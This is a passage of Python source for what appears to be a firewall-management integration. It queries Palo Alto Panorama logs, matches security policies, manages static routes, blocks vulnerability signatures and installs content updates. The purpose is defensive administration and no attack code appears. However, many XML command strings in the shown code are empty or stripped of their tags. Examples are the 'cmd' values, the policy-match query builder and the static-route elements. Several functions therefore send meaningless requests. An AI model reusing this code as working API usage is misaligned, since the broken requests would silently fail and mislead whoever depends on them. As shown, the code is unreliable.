query += build_array_query(query, zone_dst, 'zone.dst', 'eq')\n if port_dst:\n if len(query) > 0 and query[-1] == ')':\n query += ' and '\n query += build_array_query(query, port_dst, 'port.dst', 'eq')\n if time_generated:\n if len(query) > 0 and query[-1] == ')':\n query += ' and '\n query += '(time_generated leq ' + time_generated + ')'\n if action:\n if len(query) > 0 and query[-1] == ')':\n query += ' and '\n query += build_array_query(query, action, 'action', 'eq')\n if rule:\n if len(query) > 0 and query[-1] == ')':\n query += ' and '\n query += build_array_query(query, rule, 'rule', 'eq')\n if url:\n if len(query) > 0 and query[-1] == ')':\n query += ' and '\n query += build_array_query(query, url, 'url', 'contains')\n if filedigest:\n if len(query) > 0 and query[-1] == ')':\n query += ' and '\n query += build_array_query(query, filedigest, 'filedigest', 'eq')\n\n return query\n\n\n@logger\ndef panorama_query_logs(log_type: str, number_of_logs: str, query: str, address_src: str, address_dst: str, ip_: str,\n zone_src: str, zone_dst: str, time_generated: str, action: str,\n port_dst: str, rule: str, url: str, filedigest: str):\n params = {\n 'type': 'log',\n 'log-type': log_type,\n 'key': API_KEY\n }\n\n if filedigest and log_type != 'wildfire':\n raise Exception('The filedigest argument is only relevant to wildfire log type.')\n if url and log_type == 'traffic':\n raise Exception('The url argument is not relevant to traffic log type.')\n\n if query:\n params['query'] = query\n else:\n if ip_ and (address_src or address_dst):\n raise Exception(\n 'The ip argument cannot be used with the address-source or the address-destination arguments.')\n params['query'] = build_logs_query(address_src, address_dst, ip_,\n zone_src, zone_dst, time_generated, action,\n port_dst, rule, url, filedigest)\n if number_of_logs:\n params['nlogs'] = number_of_logs\n\n result = http_request(\n URL,\n 'GET',\n params=params,\n )\n\n return result\n\n\ndef panorama_query_logs_command(args: dict):\n \"\"\"\n Query logs\n \"\"\"\n log_type = args.get('log-type')\n number_of_logs = args.get('number_of_logs')\n query = args.get('query')\n address_src = args.get('addr-src')\n address_dst = args.get('addr-dst')\n ip_ = args.get('ip')\n zone_src = args.get('zone-src')\n zone_dst = args.get('zone-dst')\n time_generated = args.get('time-generated')\n action = args.get('action')\n port_dst = args.get('port-dst')\n rule = args.get('rule')\n filedigest = args.get('filedigest')\n url = args.get('url')\n if url and url[-1] != '/':\n url += '/'\n\n if query and (address_src or address_dst or zone_src or zone_dst\n or time_generated or action or port_dst or rule or url or filedigest):\n raise Exception('Use the free query argument or the fixed search parameters arguments to build your query.')\n\n result = panorama_query_logs(log_type, number_of_logs, query, address_src, address_dst, ip_,\n zone_src, zone_dst, time_generated, action,\n port_dst, rule, url, filedigest)\n\n if result['response']['@status'] == 'error':\n if 'msg' in result['response'] and 'line' in result['response']['msg']:\n message = '. Reason is: ' + result['response']['msg']['line']\n raise Exception('Query logs failed' + message)\n else:\n raise Exception('Query logs failed.')\n\n if 'response' not in result or 'result' not in result['response'] or 'job' not in result['response']['result']:\n raise Exception('Missing JobID in response.')\n\n query_logs_output = {\n 'JobID': result['response']['result']['job'],\n 'Status': 'Pending',\n 'LogType': log_type,\n 'Message': result['response']['result']['msg']['line']\n }\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': tableToMarkdown('Query Logs:', query_logs_output, ['JobID', 'Status'], removeNull=True),\n 'EntryContext': {\"Panorama.Monitor(val.JobID == obj.JobID)\": query_logs_output}\n })\n\n\ndef panorama_check_logs_status_command(job_id: str):\n \"\"\"\n Check query logs status\n \"\"\"\n job_ids = argToList(job_id)\n for job_id in job_ids:\n result = panorama_get_traffic_logs(job_id)\n\n if result['response']['@status'] == 'error':\n if 'msg' in result['response'] and 'line' in result['response']['msg']:\n message = '. Reason is: ' + result['response']['msg']['line']\n raise Exception('Query logs failed' + message)\n else:\n raise Exception('Query logs failed.')\n\n query_logs_status_output = {\n 'JobID': job_id,\n 'Status': 'Pending'\n }\n\n if 'response' not in result or 'result' not in result['response'] or 'job' not in result['response']['result'] \\\n or 'status' not in result['response']['result']['job']:\n raise Exception('Missing JobID status in response.')\n if result['response']['result']['job']['status'] == 'FIN':\n query_logs_status_output['Status'] = 'Completed'\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': tableToMarkdown('Query Logs status:', query_logs_status_output, ['JobID', 'Status'],\n removeNull=True),\n 'EntryContext': {\"Panorama.Monitor(val.JobID == obj.JobID)\": query_logs_status_output}\n })\n\n\ndef prettify_log(log: dict):\n pretty_log = {}\n\n if 'action' in log:\n pretty_log['Action'] = log['action']\n if 'app' in log:\n pretty_log['Application'] = log['app']\n if 'bytes' in log:\n pretty_log['Bytes'] = log['bytes']\n if 'bytes_received' in log:\n pretty_log['BytesReceived'] = log['bytes_received']\n if 'bytes_sent' in log:\n pretty_log['BytesSent'] = log['bytes_sent']\n if 'category' in log:\n pretty_log['CategoryOrVerdict'] = log['category']\n if 'device_name' in log:\n pretty_log['DeviceName'] = log['device_name']\n if 'dst' in log:\n pretty_log['DestinationAddress'] = log['dst']\n if 'dstuser' in log:\n pretty_log['DestinationUser'] = log['dstuser']\n if 'dstloc' in log:\n pretty_log['DestinationCountry'] = log['dstloc']\n if 'dport' in log:\n pretty_log['DestinationPort'] = log['dport']\n if 'filedigest' in log:\n pretty_log['FileDigest'] = log['filedigest']\n if 'filename' in log:\n pretty_log['FileName'] = log['filename']\n if 'filetype' in log:\n pretty_log['FileType'] = log['filetype']\n if 'from' in log:\n pretty_log['FromZone'] = log['from']\n if 'misc' in log:\n pretty_log['URLOrFilename'] = log['misc']\n if 'natdst' in log:\n pretty_log['NATDestinationIP'] = log['natdst']\n if 'natdport' in log:\n pretty_log['NATDestinationPort'] = log['natdport']\n if 'natsrc' in log:\n pretty_log['NATSourceIP'] = log['natsrc']\n if 'natsport' in log:\n pretty_log['NATSourcePort'] = log['natsport']\n if 'pcap_id' in log:\n pretty_log['PCAPid'] = log['pcap_id']\n if 'proto' in log:\n pretty_log['IPProtocol'] = log['proto']\n if 'recipient' in log:\n pretty_log['Recipient'] = log['recipient']\n if 'rule' in log:\n pretty_log['Rule'] = log['rule']\n if 'rule_uuid' in log:\n pretty_log['RuleID'] = log['rule_uuid']\n if 'receive_time' in log:\n pretty_log['ReceiveTime'] = log['receive_time']\n if 'sender' in log:\n pretty_log['Sender'] = log['sender']\n if 'sessionid' in log:\n pretty_log['SessionID'] = log['sessionid']\n if 'serial' in log:\n pretty_log['DeviceSN'] = log['serial']\n if 'severity' in log:\n pretty_log['Severity'] = log['severity']\n if 'src' in log:\n pretty_log['SourceAddress'] = log['src']\n if 'srcloc' in log:\n pretty_log['SourceCountry'] = log['srcloc']\n if 'srcuser' in log:\n pretty_log['SourceUser'] = log['srcuser']\n if 'sport' in log:\n pretty_log['SourcePort'] = log['sport']\n if 'thr_category' in log:\n pretty_log['ThreatCategory'] = log['thr_category']\n if 'threatid' in log:\n pretty_log['Name'] = log['threatid']\n if 'tid' in log:\n pretty_log['ID'] = log['tid']\n if 'to' in log:\n pretty_log['ToZone'] = log['to']\n if 'time_generated' in log:\n pretty_log['TimeGenerated'] = log['time_generated']\n if 'url_category_list' in log:\n pretty_log['URLCategoryList'] = log['url_category_list']\n if 'vsys' in log:\n pretty_log['Vsys'] = log['vsys']\n\n return pretty_log\n\n\ndef prettify_logs(logs: Union[list, dict]):\n if not isinstance(logs, list): # handle case of only one log that matched the query\n return prettify_log(logs)\n pretty_logs_arr = []\n for log in logs:\n pretty_log = prettify_log(log)\n pretty_logs_arr.append(pretty_log)\n return pretty_logs_arr\n\n\ndef panorama_get_logs_command(args: dict):\n ignore_auto_extract = args.get('ignore_auto_extract') == 'true'\n job_ids = argToList(args.get('job_id'))\n for job_id in job_ids:\n result = panorama_get_traffic_logs(job_id)\n log_type_dt = demisto.dt(demisto.context(), f'Panorama.Monitor(val.JobID === \"{job_id}\").LogType')\n if isinstance(log_type_dt, list):\n log_type = log_type_dt[0]\n else:\n log_type = log_type_dt\n\n if result['response']['@status'] == 'error':\n if 'msg' in result['response'] and 'line' in result['response']['msg']:\n message = '. Reason is: ' + result['response']['msg']['line']\n raise Exception('Query logs failed' + message)\n else:\n raise Exception('Query logs failed.')\n\n query_logs_output = {\n 'JobID': job_id,\n 'Status': 'Pending'\n }\n\n if 'response' not in result or 'result' not in result['response'] or 'job' not in result['response']['result'] \\\n or 'status' not in result['response']['result']['job']:\n raise Exception('Missing JobID status in response.')\n\n if result['response']['result']['job']['status'] != 'FIN':\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': tableToMarkdown('Query Logs status:', query_logs_output,\n ['JobID', 'Status'], removeNull=True),\n 'EntryContext': {\"Panorama.Monitor(val.JobID == obj.JobID)\": query_logs_output}\n })\n else: # FIN\n query_logs_output['Status'] = 'Completed'\n if 'response' not in result or 'result' not in result['response'] or 'log' not in result['response'][\n 'result'] \\\n or 'logs' not in result['response']['result']['log']:\n raise Exception('Missing logs in response.')\n\n logs = result['response']['result']['log']['logs']\n if logs['@count'] == '0':\n human_readable = f'No {log_type} logs matched the query.'\n else:\n pretty_logs = prettify_logs(logs['entry'])\n query_logs_output['Logs'] = pretty_logs\n human_readable = tableToMarkdown('Query ' + log_type + ' Logs:', query_logs_output['Logs'],\n ['TimeGenerated', 'SourceAddress', 'DestinationAddress', 'Application',\n 'Action', 'Rule', 'URLOrFilename'], removeNull=True)\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': human_readable,\n 'IgnoreAutoExtract': ignore_auto_extract,\n 'EntryContext': {\"Panorama.Monitor(val.JobID == obj.JobID)\": query_logs_output}\n })\n\n\n''' Security Policy Match'''\n\n\ndef build_policy_match_query(application: Optional[str] = None, category: Optional[str] = None,\n destination: Optional[str] = None,\n destination_port: Optional[str] = None, from_: Optional[str] = None,\n to_: Optional[str] = None,\n protocol: Optional[str] = None, source: Optional[str] = None,\n source_user: Optional[str] = None):\n query = ''\n if from_:\n query += f'{from_}'\n if to_:\n query += f'{to_}'\n if source:\n query += f'{source}'\n if destination:\n query += f'{destination}'\n if destination_port:\n query += f'{destination_port}'\n if protocol:\n query += f'{protocol}'\n if source_user:\n query += f'{source_user}'\n if application:\n query += f'{application}'\n if category:\n query += f'{category}'\n query += ''\n\n return query\n\n\ndef panorama_security_policy_match(application: Optional[str] = None, category: Optional[str] = None,\n destination: Optional[str] = None, destination_port: Optional[str] = None,\n from_: Optional[str] = None, to_: Optional[str] = None,\n protocol: Optional[str] = None, source: Optional[str] = None,\n source_user: Optional[str] = None):\n params = {'type': 'op', 'key': API_KEY,\n 'cmd': build_policy_match_query(application, category, destination, destination_port, from_, to_,\n protocol, source, source_user)}\n\n result = http_request(\n URL,\n 'GET',\n params=params\n )\n\n return result['response']['result']\n\n\ndef prettify_matching_rule(matching_rule: dict):\n pretty_matching_rule = {}\n\n if '@name' in matching_rule:\n pretty_matching_rule['Name'] = matching_rule['@name']\n if 'from' in matching_rule:\n pretty_matching_rule['From'] = matching_rule['from']\n if 'source' in matching_rule:\n pretty_matching_rule['Source'] = matching_rule['source']\n if 'to' in matching_rule:\n pretty_matching_rule['To'] = matching_rule['to']\n if 'destination' in matching_rule:\n pretty_matching_rule['Destination'] = matching_rule['destination']\n if 'category' in matching_rule:\n pretty_matching_rule['Category'] = matching_rule['category']\n if 'action' in matching_rule:\n pretty_matching_rule['Action'] = matching_rule['action']\n\n return pretty_matching_rule\n\n\ndef prettify_matching_rules(matching_rules: Union[list, dict]):\n if not isinstance(matching_rules, list): # handle case of only one log that matched the query\n return prettify_matching_rule(matching_rules)\n\n pretty_matching_rules_arr = []\n for matching_rule in matching_rules:\n pretty_matching_rule = prettify_matching_rule(matching_rule)\n pretty_matching_rules_arr.append(pretty_matching_rule)\n\n return pretty_matching_rules_arr\n\n\ndef prettify_query_fields(application: Optional[str] = None, category: Optional[str] = None,\n destination: Optional[str] = None, destination_port: Optional[str] = None,\n from_: Optional[str] = None, to_: Optional[str] = None, protocol: Optional[str] = None,\n source: Optional[str] = None, source_user: Optional[str] = None):\n pretty_query_fields = {'Source': source, 'Destination': destination, 'Protocol': protocol}\n if application:\n pretty_query_fields['Application'] = application\n if category:\n pretty_query_fields['Category'] = category\n if destination_port:\n pretty_query_fields['DestinationPort'] = destination_port\n if from_:\n pretty_query_fields['From'] = from_\n if to_:\n pretty_query_fields['To'] = to_\n if source_user:\n pretty_query_fields['SourceUser'] = source_user\n return pretty_query_fields\n\n\ndef panorama_security_policy_match_command(args: dict):\n if not VSYS:\n raise Exception(\"The 'panorama-security-policy-match' command is only relevant for a Firewall instance.\")\n\n application = args.get('application')\n category = args.get('category')\n destination = args.get('destination')\n destination_port = args.get('destination-port')\n from_ = args.get('from')\n to_ = args.get('to')\n protocol = args.get('protocol')\n source = args.get('source')\n source_user = args.get('source-user')\n\n matching_rules = panorama_security_policy_match(application, category, destination, destination_port, from_, to_,\n protocol, source, source_user)\n if not matching_rules:\n return_results('The query did not match a Security policy.')\n else:\n ec_ = {'Rules': prettify_matching_rules(matching_rules['rules']['entry']),\n 'QueryFields': prettify_query_fields(application, category, destination, destination_port,\n from_, to_, protocol, source, source_user),\n 'Query': build_policy_match_query(application, category, destination, destination_port,\n from_, to_, protocol, source, source_user)}\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': matching_rules,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': tableToMarkdown('Matching Security Policies:', ec_['Rules'],\n ['Name', 'Action', 'From', 'To', 'Source', 'Destination', 'Application'],\n removeNull=True),\n 'EntryContext': {\"Panorama.SecurityPolicyMatch(val.Query == obj.Query)\": ec_}\n })\n\n\n''' Static Routes'''\n\n\ndef prettify_static_route(static_route: Dict, virtual_router: str, template: Optional[str] = None) -> Dict[str, str]:\n pretty_static_route: Dict = {}\n\n if '@name' in static_route:\n pretty_static_route['Name'] = static_route['@name']\n if 'bfd' in static_route and 'profile' in static_route['bfd']:\n pretty_static_route['BFDprofile'] = static_route['bfd']['profile']\n if 'destination' in static_route:\n if '@dirtyId' in static_route['destination']:\n pretty_static_route['Uncommitted'] = True\n else:\n pretty_static_route['Destination'] = static_route['destination']\n if 'metric' in static_route:\n pretty_static_route['Metric'] = int(static_route['metric'])\n if 'nexthop' in static_route:\n if '@dirtyId' in static_route['destination']:\n pretty_static_route['Uncommitted'] = True\n else:\n nexthop: Dict[str, str] = static_route['nexthop']\n if 'ip-address' in nexthop:\n pretty_static_route['NextHop'] = nexthop['ip-address']\n elif 'next-vr' in static_route['nexthop']:\n pretty_static_route['NextHop'] = nexthop['next-vr']\n elif 'fqdn' in static_route['nexthop']:\n pretty_static_route['NextHop'] = nexthop['fqdn']\n elif 'discard' in static_route['nexthop']:\n pretty_static_route['NextHop'] = nexthop['discard']\n if 'route-table' in static_route:\n route_table = static_route['route-table']\n if 'unicast' in route_table:\n pretty_static_route['RouteTable'] = 'Unicast'\n elif 'multicast' in route_table:\n pretty_static_route['RouteTable'] = 'Multicast'\n elif 'both' in route_table:\n pretty_static_route['RouteTable'] = 'Both'\n else: # route table is no-install\n pretty_static_route['RouteTable'] = 'No install'\n pretty_static_route['VirtualRouter'] = virtual_router\n if template:\n pretty_static_route['Template'] = template\n\n return pretty_static_route\n\n\ndef prettify_static_routes(static_routes: Union[dict, list], virtual_router: str, template: Optional[str] = None):\n if not isinstance(static_routes, list): # handle case of only one static route in a virtual router\n return prettify_static_route(static_routes, virtual_router, template)\n\n pretty_static_route_arr = []\n for static_route in static_routes:\n pretty_static_route = prettify_static_route(static_route, virtual_router, template)\n pretty_static_route_arr.append(pretty_static_route)\n\n return pretty_static_route_arr\n\n\n@logger\ndef panorama_list_static_routes(xpath_network: str, virtual_router: str, show_uncommitted: str) -> Dict[str, str]:\n action = 'get' if show_uncommitted else 'show'\n params = {\n 'action': action,\n 'type': 'config',\n 'xpath': f'{xpath_network}/virtual-router/entry[@name=\\'{virtual_router}\\']/routing-table/ip/static-route',\n 'key': API_KEY\n }\n result = http_request(URL, 'GET', params=params)\n return result['response']['result']\n\n\ndef panorama_list_static_routes_command(args: dict):\n \"\"\"\n List all static routes of a virtual Router\n \"\"\"\n template = args.get('template')\n xpath_network, template = set_xpath_network(template)\n virtual_router = args['virtual_router']\n show_uncommitted = args.get('show_uncommitted') == 'true'\n virtual_router_object = panorama_list_static_routes(xpath_network, virtual_router, show_uncommitted)\n\n if 'static-route' not in virtual_router_object or 'entry' not in virtual_router_object['static-route']:\n human_readable = 'The Virtual Router has does not exist or has no static routes configured.'\n static_routes = virtual_router_object\n else:\n static_routes = prettify_static_routes(virtual_router_object['static-route']['entry'], virtual_router, template)\n table_header = f'Displaying all Static Routes for the Virtual Router: {virtual_router}'\n headers = ['Name', 'Destination', 'NextHop', 'Uncommitted', 'RouteTable', 'Metric', 'BFDprofile']\n human_readable = tableToMarkdown(name=table_header, t=static_routes, headers=headers, removeNull=True)\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': virtual_router_object,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': human_readable,\n 'EntryContext': {\"Panorama.StaticRoutes(val.Name == obj.Name)\": static_routes}\n })\n\n\n@logger\ndef panorama_get_static_route(xpath_network: str, virtual_router: str, static_route_name: str) -> Dict[str, str]:\n params = {\n 'action': 'get',\n 'type': 'config',\n 'xpath': f'{xpath_network}/virtual-router/entry[@name=\\'{virtual_router}\\']/routing-table/ip/'\n f'static-route/entry[@name=\\'{static_route_name}\\']',\n 'key': API_KEY\n }\n result = http_request(URL, 'GET', params=params)\n return result['response']['result']\n\n\ndef panorama_get_static_route_command(args: dict):\n \"\"\"\n Get a static route of a virtual router\n \"\"\"\n template = args.get('template')\n xpath_network, template = set_xpath_network(template)\n virtual_router = args['virtual_router']\n static_route_name = args['static_route']\n static_route_object = panorama_get_static_route(xpath_network, virtual_router, static_route_name)\n if '@count' in static_route_object and int(static_route_object['@count']) < 1:\n raise Exception('Static route does not exist.')\n static_route = prettify_static_route(static_route_object['entry'], virtual_router, template)\n table_header = f'Static route: {static_route_name}'\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': static_route_object,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': tableToMarkdown(name=table_header, t=static_route, removeNull=True),\n 'EntryContext': {\n \"Panorama.StaticRoutes(val.Name == obj.Name)\": static_route\n }\n })\n\n\n@logger\ndef panorama_add_static_route(xpath_network: str, virtual_router: str, static_route_name: str, destination: str,\n nexthop_type: str, nexthop_value: str, interface: str = None,\n metric: str = None) -> Dict[str, str]:\n params = {\n 'action': 'set',\n 'type': 'config',\n 'key': API_KEY,\n 'xpath': f'{xpath_network}/virtual-router/entry[@name=\\'{virtual_router}\\']/'\n f'routing-table/ip/static-route/entry[@name=\\'{static_route_name}\\']',\n 'element': f'{destination}'\n f'<{nexthop_type}>{nexthop_value}'\n }\n if interface:\n params[\"element\"] = f'{params[\"element\"]}{interface}'\n if metric:\n params['element'] = f'{params[\"element\"]}{metric}'\n\n result = http_request(URL, 'GET', params=params)\n return result['response']\n\n\ndef panorama_add_static_route_command(args: dict):\n \"\"\"\n Add a Static Route\n \"\"\"\n template = args.get('template')\n xpath_network, template = set_xpath_network(template)\n virtual_router = args.get('virtual_router')\n static_route_name = args.get('static_route')\n destination = args.get('destination')\n nexthop_type = args.get('nexthop_type')\n nexthop_value = args.get('nexthop_value')\n interface = args.get('interface', None)\n metric = args.get('metric', None)\n\n if nexthop_type == 'fqdn':\n # Only from PAN-OS 9.x, creating a static route based on FQDN nexthop is available.\n major_version = get_pan_os_major_version()\n\n if major_version <= 8:\n raise Exception('Next Hop of type FQDN is only available for PAN-OS 9.x instances.')\n static_route = panorama_add_static_route(xpath_network, virtual_router, static_route_name, destination,\n nexthop_type, nexthop_value, interface, metric)\n human_readable = f'New uncommitted static route {static_route_name} configuration added.'\n entry_context = {\n 'Name': static_route_name,\n 'VirtualRouter': virtual_router,\n 'Destination': destination,\n 'NextHop': nexthop_value,\n }\n if interface:\n entry_context['Interface'] = interface\n if metric:\n entry_context['Metric'] = metric\n if template:\n entry_context['Template'] = template\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': static_route,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': human_readable,\n 'EntryContext': {\"Panorama.StaticRoutes(val.Name == obj.Name)\": static_route}\n })\n\n\ndef panorama_override_vulnerability(threatid: str, vulnerability_profile: str, drop_mode: str):\n xpath = \"{}profiles/vulnerability/entry[@name='{}']/threat-exception/entry[@name='{}']/action\".format(\n XPATH_OBJECTS,\n vulnerability_profile,\n threatid)\n params = {'action': 'set',\n 'type': 'config',\n 'xpath': xpath,\n 'key': API_KEY,\n 'element': \"<{0}>\".format(drop_mode)\n }\n\n return http_request(\n URL,\n 'POST',\n body=params,\n )\n\n\n@logger\ndef panorama_get_predefined_threats_list(target: str):\n \"\"\"\n Get the entire list of predefined threats as a file in Demisto\n \"\"\"\n params = {\n 'type': 'op',\n 'cmd': '/predefined/threats',\n 'target': target,\n 'key': API_KEY\n }\n result = http_request(\n URL,\n 'GET',\n params=params\n )\n return result\n\n\ndef panorama_get_predefined_threats_list_command(target: Optional[str] = None):\n result = panorama_get_predefined_threats_list(target)\n return_results(fileResult('predefined-threats.json', json.dumps(result['response']['result']).encode('utf-8')))\n\n\ndef panorama_block_vulnerability(args: dict):\n \"\"\"\n Override vulnerability signature such that it is in block mode\n \"\"\"\n threatid = args.get('threat_id', '')\n vulnerability_profile = args.get('vulnerability_profile', '')\n drop_mode = args.get('drop_mode', 'drop')\n\n threat = panorama_override_vulnerability(threatid, vulnerability_profile, drop_mode)\n threat_output = {'ID': threatid, 'NewAction': drop_mode}\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': threat,\n 'ReadableContentsFormat': formats['text'],\n 'HumanReadable': 'Threat with ID {} overridden.'.format(threatid),\n 'EntryContext': {\n \"Panorama.Vulnerability(val.Name == obj.Name)\": threat_output\n }\n })\n\n\n@logger\ndef panorama_delete_static_route(xpath_network: str, virtual_router: str, route_name: str) -> Dict[str, str]:\n params = {\n 'action': 'delete',\n 'type': 'config',\n 'xpath': f'{xpath_network}/virtual-router/entry[@name=\\'{virtual_router}\\']/'\n f'routing-table/ip/static-route/entry[@name=\\'{route_name}\\']',\n 'key': API_KEY\n }\n result = http_request(URL, 'DELETE', params=params)\n return result\n\n\ndef panorama_delete_static_route_command(args: dict):\n \"\"\"\n Delete a Static Route\n \"\"\"\n template = args.get('template')\n xpath_network, template = set_xpath_network(template)\n virtual_router = args['virtual_router']\n route_name = args['route_name']\n deleted_static_route = panorama_delete_static_route(xpath_network, virtual_router, route_name)\n entry_context = {\n 'Name': route_name,\n 'Deleted': True\n }\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': deleted_static_route,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': f'The static route: {route_name} was deleted. Changes are not committed.',\n 'EntryContext': {\"Panorama.StaticRoutes(val.Name == obj.Name)\": entry_context} # add key -> deleted: true\n })\n\n\ndef panorama_show_device_version(target: str = None):\n params = {\n 'type': 'op',\n 'cmd': '',\n 'key': API_KEY\n }\n if target:\n params['target'] = target\n\n result = http_request(\n URL,\n 'GET',\n params=params\n )\n\n return result['response']['result']['system']\n\n\ndef panorama_show_device_version_command(target: Optional[str] = None):\n \"\"\"\n Get device details and show message in war room\n \"\"\"\n response = panorama_show_device_version(target)\n\n info_data = {\n 'Devicename': response['devicename'],\n 'Model': response['model'],\n 'Serial': response['serial'],\n 'Version': response['sw-version']\n }\n entry_context = {\"Panorama.Device.Info(val.Devicename === obj.Devicename)\": info_data}\n headers = ['Devicename', 'Model', 'Serial', 'Version']\n human_readable = tableToMarkdown('Device Version:', info_data, headers=headers, removeNull=True)\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': response,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': human_readable,\n 'EntryContext': entry_context\n })\n\n\n@logger\ndef panorama_download_latest_content_update_content(target: str):\n params = {\n 'type': 'op',\n 'target': target,\n 'cmd': '',\n 'key': API_KEY\n }\n result = http_request(\n URL,\n 'POST',\n body=params\n )\n\n return result\n\n\ndef panorama_download_latest_content_update_command(target: Optional[str] = None):\n \"\"\"\n Download content and show message in war room\n \"\"\"\n if DEVICE_GROUP:\n raise Exception('Download latest content is only supported on Firewall (not Panorama).')\n result = panorama_download_latest_content_update_content(target)\n\n if 'result' in result['response']:\n # download has been given a jobid\n download_status_output = {\n 'JobID': result['response']['result']['job'],\n 'Status': 'Pending'\n }\n entry_context = {\"Panorama.Content.Download(val.JobID == obj.JobID)\": download_status_output}\n human_readable = tableToMarkdown('Content download:',\n download_status_output, ['JobID', 'Status'], removeNull=True)\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': human_readable,\n 'EntryContext': entry_context\n })\n else:\n # no download took place\n return_results(result['response']['msg'])\n\n\n@logger\ndef panorama_content_update_download_status(target: str, job_id: str):\n params = {\n 'type': 'op',\n 'cmd': f'{job_id}',\n 'target': target,\n 'key': API_KEY\n }\n result = http_request(\n URL,\n 'GET',\n params=params\n )\n\n return result\n\n\ndef panorama_content_update_download_status_command(args: dict):\n \"\"\"\n Check jobID of content update download status\n \"\"\"\n if DEVICE_GROUP:\n raise Exception('Content download status is only supported on Firewall (not Panorama).')\n target = str(args['target']) if 'target' in args else None\n job_id = args['job_id']\n result = panorama_content_update_download_status(target, job_id)\n\n content_download_status = {\n 'JobID': result['response']['result']['job']['id']\n }\n if result['response']['result']['job']['status'] == 'FIN':\n if result['response']['result']['job']['result'] == 'OK':\n content_download_status['Status'] = 'Completed'\n else:\n content_download_status['Status'] = 'Failed'\n content_download_status['Details'] = result['response']['result']['job']\n\n if result['response']['result']['job']['status'] == 'PEND':\n content_download_status['Status'] = 'Pending'\n\n entry_context = {\"Panorama.Content.Download(val.JobID == obj.JobID)\": content_download_status}\n human_readable = tableToMarkdown('Content download status:', content_download_status,\n ['JobID', 'Status', 'Details'], removeNull=True)\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': human_readable,\n 'EntryContext': entry_context\n })\n\n\n@logger\ndef panorama_install_latest_content_update(target: str):\n params = {\n 'type': 'op',\n 'cmd': 'latest',\n 'target': target,\n 'key': API_KEY\n }\n result = http_request(\n URL,\n 'GET',\n params=params\n )\n\n return result\n\n\ndef panorama_install_latest_content_update_command(target: Optional[str] = None):\n \"\"\"\n Check jobID of content content install status\n \"\"\"\n if DEVICE_GROUP:\n raise Exception('Content download status is only supported on Firewall (not Panorama).')\n result = panorama_install_latest_content_update(target)\n\n if 'result' in result['response']:\n # installation has been given a jobid\n content_install_info = {\n 'JobID': result['response']['result']['job'],\n 'Status': 'Pending'\n }\n entry_context = {\"Panorama.Content.Install(val.JobID == obj.JobID)\": content_install_info}\n human_readable = tableToMarkdown('Result:', content_install_info, ['JobID', 'Status'], removeNull=True)\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': human_readable,\n 'EntryContext': entry_context\n })\n else:\n # no content install took place\n return_results(result['response']['msg'])\n\n\n@logger\ndef panorama_content_update_install_status(target: str, job_id: str):\n params = {\n 'type': 'op',\n 'cmd': f'{job_id}',\n 'target': target,\n 'key': API_KEY\n }\n result = http_request(\n URL,\n 'GET',\n params=params\n )\n\n return result\n\n\ndef panorama_content_update_install_status_command(args: dict):\n \"\"\"\n Check jobID of content update install status\n \"\"\"\n target = str(args['target']) if 'target' in args else None\n job_id = args['job_id']\n result = panorama_content_update_install_status(target, job_id)\n\n content_install_status = {\n 'JobID': result['response']['result']['job']['id']\n }\n if result['response']['result']['job']['status'] == 'FIN':\n if result['response']['result']['job']['result'] == 'OK':\n content_install_status['Status'] = 'Completed'\n else:\n # result['response']['job']['result'] == 'FAIL'\n content_install_status['Status'] = 'Failed'\n content_install_status['Details'] = result['response']['result']['job']\n\n if result['response']['result']['job']['status'] == 'PEND':\n content_install_status['Status'] = 'Pending'\n\n entry_context = {\"Panorama.Content.Install(val.JobID == obj.JobID)\": content_install_status}\n human_readable = tableToMarkdown('Content install status:', content_install_status,\n ['JobID', 'Status', 'Details'], removeNull=True)\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': human_readable,\n 'EntryContext': entry_context\n })\n\n\ndef panorama_check_latest_panos_software_command(target: Optional[str] = None):\n if DEVICE_GROUP:\n raise Exception('Checking latest PAN-OS version is only supported on Firewall (not Panorama).')\n params = {\n 'type': 'op',\n 'cmd': '',\n 'target': target,\n 'key': API_KEY\n }\n result = http_request(\n URL,\n 'GET',\n params=params\n )\n return_results(result['response']['result'])\n\n\n@logger\ndef panorama_download_panos_version(target: str, target_version: str):\n params = {\n 'type': 'op',\n 'cmd': f'{target_version}'\n f'',\n 'target': target,\n 'key': API_KEY\n }\n result = http_request(\n URL,\n 'GET',\n 